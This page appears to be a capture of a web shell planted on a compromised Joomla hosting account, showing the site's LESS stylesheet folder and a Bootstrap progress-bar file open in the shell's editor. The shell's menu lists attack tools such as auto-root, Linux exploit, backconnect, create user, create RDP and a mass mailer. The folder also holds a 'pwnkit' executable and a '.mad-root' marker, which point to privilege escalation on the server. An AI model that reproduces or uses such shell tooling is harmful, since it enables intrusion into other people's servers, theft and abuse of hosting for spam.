Linux webm002.cluster120.gra.hosting.ovh.net 6.18.42-ovh-vps-grsec-zfs+ #1 SMP PREEMPT_DYNAMIC Wed Aug 5 15:59:48 CEST 2026 x86_64
Apache
: 10.120.20.2 | : 216.73.216.49
Cant Read [ /etc/named.conf ]
8.5.7
verseaumee
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
home /
verseaumee /
www /
media /
jui /
less /
[ HOME SHELL ]
Name
Size
Permission
Action
.mad-root
0
B
-rw-r--r--
accordion.less
636
B
-rw-r--r--
alerts.less
1.36
KB
-rw-r--r--
bootstrap-extended.less
9.77
KB
-rw-r--r--
bootstrap-rtl.less
12.49
KB
-rw-r--r--
bootstrap.less
1.67
KB
-rw-r--r--
breadcrumbs.less
431
B
-rw-r--r--
button-groups.less
5.58
KB
-rw-r--r--
buttons.less
4.65
KB
-rw-r--r--
carousel.less
2.42
KB
-rw-r--r--
close.less
901
B
-rw-r--r--
code.less
1.25
KB
-rw-r--r--
component-animations.less
306
B
-rw-r--r--
dropdowns.less
5.91
KB
-rw-r--r--
forms.less
16.04
KB
-rw-r--r--
grid.less
429
B
-rw-r--r--
hero-unit.less
521
B
-rw-r--r--
icomoon.less
11.93
KB
-rw-r--r--
labels-badges.less
1.84
KB
-rw-r--r--
layouts.less
329
B
-rw-r--r--
media.less
860
B
-rw-r--r--
mixins.less
22.83
KB
-rw-r--r--
modals.joomla.less
1.59
KB
-rw-r--r--
modals.less
1.59
KB
-rw-r--r--
navbar.less
11.81
KB
-rw-r--r--
navs.less
7.97
KB
-rw-r--r--
pager.less
760
B
-rw-r--r--
pagination.less
2.62
KB
-rw-r--r--
popovers.less
3
KB
-rw-r--r--
progress-bars.less
2.79
KB
-rw-r--r--
pwnkit
0
B
-rwxr-xr-x
reset.less
4.12
KB
-rw-r--r--
responsive-1200px-min.less
565
B
-rw-r--r--
responsive-767px-max.joomla.le...
705
B
-rw-r--r--
responsive-767px-max.less
4.09
KB
-rw-r--r--
responsive-768px-979px.less
463
B
-rw-r--r--
responsive-navbar.less
4.23
KB
-rw-r--r--
responsive-utilities.less
1.56
KB
-rw-r--r--
responsive.less
1.04
KB
-rw-r--r--
scaffolding.less
885
B
-rw-r--r--
sprites.less
10.58
KB
-rw-r--r--
tables.less
6.26
KB
-rw-r--r--
thumbnails.less
1.16
KB
-rw-r--r--
tooltip.less
1.64
KB
-rw-r--r--
type.less
4.74
KB
-rw-r--r--
utilities.less
335
B
-rw-r--r--
variables.less
8.93
KB
-rw-r--r--
wells.less
552
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : progress-bars.less
// // Progress bars // -------------------------------------------------- // ANIMATIONS // ---------- // Webkit @-webkit-keyframes progress-bar-stripes { from { background-position: 40px 0; } to { background-position: 0 0; } } // Firefox @-moz-keyframes progress-bar-stripes { from { background-position: 40px 0; } to { background-position: 0 0; } } // IE9 @-ms-keyframes progress-bar-stripes { from { background-position: 40px 0; } to { background-position: 0 0; } } // Opera @-o-keyframes progress-bar-stripes { from { background-position: 0 0; } to { background-position: 40px 0; } } // Spec @keyframes progress-bar-stripes { from { background-position: 40px 0; } to { background-position: 0 0; } } // THE BARS // -------- // Outer container .progress { overflow: hidden; height: @baseLineHeight; margin-bottom: @baseLineHeight; #gradient > .vertical(#f5f5f5, #f9f9f9); .box-shadow(inset 0 1px 2px rgba(0,0,0,.1)); .border-radius(@baseBorderRadius); } // Bar of progress .progress .bar { width: 0%; height: 100%; color: @white; float: left; font-size: 12px; text-align: center; text-shadow: 0 -1px 0 rgba(0,0,0,.25); #gradient > .vertical(#149bdf, #0480be); .box-shadow(inset 0 -1px 0 rgba(0,0,0,.15)); .box-sizing(border-box); .transition(width .6s ease); } .progress .bar + .bar { .box-shadow(~"inset 1px 0 0 rgba(0,0,0,.15), inset 0 -1px 0 rgba(0,0,0,.15)"); } // Striped bars .progress-striped .bar { #gradient > .striped(#149bdf); .background-size(40px 40px); } // Call animation for the active one .progress.active .bar { -webkit-animation: progress-bar-stripes 2s linear infinite; -moz-animation: progress-bar-stripes 2s linear infinite; -ms-animation: progress-bar-stripes 2s linear infinite; -o-animation: progress-bar-stripes 2s linear infinite; animation: progress-bar-stripes 2s linear infinite; } // COLORS // ------ // Danger (red) .progress-danger .bar, .progress .bar-danger { #gradient > .vertical(#ee5f5b, #c43c35); } .progress-danger.progress-striped .bar, .progress-striped .bar-danger { #gradient > .striped(#ee5f5b); } // Success (green) .progress-success .bar, .progress .bar-success { #gradient > .vertical(#62c462, #57a957); } .progress-success.progress-striped .bar, .progress-striped .bar-success { #gradient > .striped(#62c462); } // Info (teal) .progress-info .bar, .progress .bar-info { #gradient > .vertical(#5bc0de, #339bb9); } .progress-info.progress-striped .bar, .progress-striped .bar-info { #gradient > .striped(#5bc0de); } // Warning (orange) .progress-warning .bar, .progress .bar-warning { #gradient > .vertical(lighten(@orange, 15%), @orange); } .progress-warning.progress-striped .bar, .progress-striped .bar-warning { #gradient > .striped(lighten(@orange, 15%)); }
Close